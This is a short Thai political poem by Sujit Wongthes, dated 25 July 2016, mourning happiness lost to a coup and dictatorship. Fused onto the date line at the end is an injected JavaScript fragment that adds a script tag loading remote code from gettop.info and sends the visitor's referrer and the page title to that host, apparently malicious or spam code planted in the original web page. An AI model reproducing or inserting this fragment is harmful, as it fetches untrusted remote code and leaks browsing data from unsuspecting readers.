จุดไฟ

 

ความสุขถูกริบรัฐประหาร

เผด็จการผลาญวอดเหมือนมอดไหม้

ประหลาดคนมีร่างแต่ร้างใจ

คืนความสุขลุกเป็นไฟในใจคน

 

สุจิตต์ วงษ์เทศ

จันทร์ 25 กรกฎาคม 2559d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;